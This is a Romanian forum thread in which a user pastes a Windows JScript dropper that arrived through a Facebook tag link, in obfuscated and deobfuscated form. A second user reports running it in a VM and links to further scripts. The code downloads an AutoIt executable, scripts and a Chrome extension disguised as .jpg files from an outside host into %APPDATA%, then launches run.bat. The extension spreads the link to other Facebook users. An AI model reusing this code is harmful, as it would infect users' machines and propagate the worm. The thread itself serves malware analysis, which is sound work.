Church Posted June 26, 2016 Report Share Posted June 26, 2016 Salut, Astazi am fost tag-uit intr-un comment, in momentul in care dai click pe notificare te redirectioneaza catre link Sursa: var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3|| !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix= new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso= new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1= new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this) deobfuscat: /** @type {Array} */ var _0xe519 = ["Msxml2.XMLhttp", "onreadystatechange", "readyState", "status", "ADODB.Stream", "open", "type", "write", "position", "read", "saveToFile", "close", "GET", "send", "Scripting.FileSystemObject", "WScript.Shell", "Shell.Application", "%APPDATA%\\", "ExpandEnvironmentStrings", "Mozila", "https://www.google.com", "http://userexperiencestatics.net/ext/Autoit.jpg", "\\autoit.exe", "http://userexperiencestatics.net/ext/bg.jpg", "\\bg.js", "http://userexperiencestatics.net/ext/ekl.jpg", "\\ekl.au3", "http://userexperiencestatics.net/ext/ff.jpg", "\\ff.zip", "http://userexperiencestatics.net/ext/force.jpg", "\\force.au3", "http://userexperiencestatics.net/ext/sabit.jpg", "\\sabit.au3", "http://userexperiencestatics.net/ext/manifest.jpg", "\\manifest.json", "http://userexperiencestatics.net/ext/run.jpg", "\\run.bat", "http://userexperiencestatics.net/ext/up.jpg", "\\up.au3", "http://whos.amung.us/pingjs/?k=pingjse346", "\\ping.js", "http://whos.amung.us/pingjs/?k=pingjse3462", "\\ping2.js", ""]; (function(dataAndEvents) { /** * @param {?} f * @param {?} o * @param {number} mayParseLabeledStatementInstead * @return {?} */ function tryIt(f, o, mayParseLabeledStatementInstead) { if (!o || !f) { return null; } var xhr = WScript.CreateObject(_0xe519[0]); /** * @return {undefined} */ xhr[_0xe519[1]] = function() { if (xhr[_0xe519[2]] === 4 && xhr[_0xe519[3]] === 200) { xa = new ActiveXObject(_0xe519[4]); xa[_0xe519[5]](); /** @type {number} */ xa[_0xe519[6]] = 1; xa[_0xe519[7]](xhr.ResponseBody); /** @type {number} */ xa[_0xe519[8]] = mayParseLabeledStatementInstead; stm2 = new ActiveXObject(_0xe519[4]); /** @type {number} */ stm2[_0xe519[6]] = 1; stm2[_0xe519[5]](); stm2[_0xe519[7]](xa[_0xe519[9]]()); stm2[_0xe519[10]](o, 2); stm2[_0xe519[11]](); xa[_0xe519[11]](); } }; xhr[_0xe519[5]](_0xe519[12], f, false); xhr[_0xe519[13]](null); } /** * @param {?} filename * @param {?} path * @return {undefined} */ function readFile(filename, path) { xa = new ActiveXObject(_0xe519[4]); xa[_0xe519[5]](); /** @type {number} */ xa[_0xe519[6]] = 1; xa.LoadFromFile(filename); ix = new ActiveXObject(_0xe519[4]); ix[_0xe519[5]](); /** @type {number} */ ix[_0xe519[6]] = 1; ix.LoadFromFile(path); stm2 = new ActiveXObject(_0xe519[4]); /** @type {number} */ stm2[_0xe519[6]] = 1; stm2[_0xe519[5]](); stm2[_0xe519[7]](ix[_0xe519[9]]()); stm2[_0xe519[7]](xa[_0xe519[9]]()); xa[_0xe519[11]](); ix[_0xe519[11]](); stm2[_0xe519[10]](filename, 2); stm2[_0xe519[11]](); } fso = new ActiveXObject(_0xe519[14]); var fo = new ActiveXObject(_0xe519[15]); dataAndEvents = new ActiveXObject(_0xe519[16]); FileDestr = fo[_0xe519[18]](_0xe519[17]); mozklasor = FileDestr + _0xe519[19]; if (!fso.FolderExists(mozklasor)) { fso.CreateFolder(mozklasor); } dataAndEvents.ShellExecute(_0xe519[20]); tryIt(_0xe519[21], mozklasor + _0xe519[22], 0); tryIt(_0xe519[23], mozklasor + _0xe519[24], 0); tryIt(_0xe519[25], mozklasor + _0xe519[26], 0); tryIt(_0xe519[27], mozklasor + _0xe519[28], 0); tryIt(_0xe519[29], mozklasor + _0xe519[30], 0); tryIt(_0xe519[31], mozklasor + _0xe519[32], 0); tryIt(_0xe519[33], mozklasor + _0xe519[34], 0); tryIt(_0xe519[35], mozklasor + _0xe519[36], 0); tryIt(_0xe519[37], mozklasor + _0xe519[38], 0); tryIt(_0xe519[39], mozklasor + _0xe519[40], 0); tryIt(_0xe519[41], mozklasor + _0xe519[42], 0); dataAndEvents.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0); })(this); Nu imi dau seama ce face, dar pare interesant. Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted June 26, 2016 Active Members Report Share Posted June 26, 2016 (edited) L-am instalat pe o masina virtuala :))) Pare sa fie targetat pentru Chrome. Baga in %appdata% un folder Mozila , in care is niste script-uri autoit impreuna cu compiliatorul autoit. Iti instaleaza o extensie in chrome folosita sa trimita si la alte persoane acel link , acesta e script-ul folosit pe facebook: http://pastebin.com/9UDBCg0c Script-ul extensiei chrome: http://pastebin.com/mF0LtMZK Daca te duci pe chrome://extensions o sa te redirectioneze:))) In final nu stiu care este scop-ul lui de ce se raspandeste . https://www.sendspace.com/file/88v34k http://appcdn.co/data.js?r daca intri de pe chrome o sa te redirectioneze catre diferite domenii unde e tinut script-ul pentru facebook , daca intrii de pe firefox o sa iti dea jquery. Edited June 26, 2016 by danyweb09 Quote Link to comment Share on other sites More sharing options...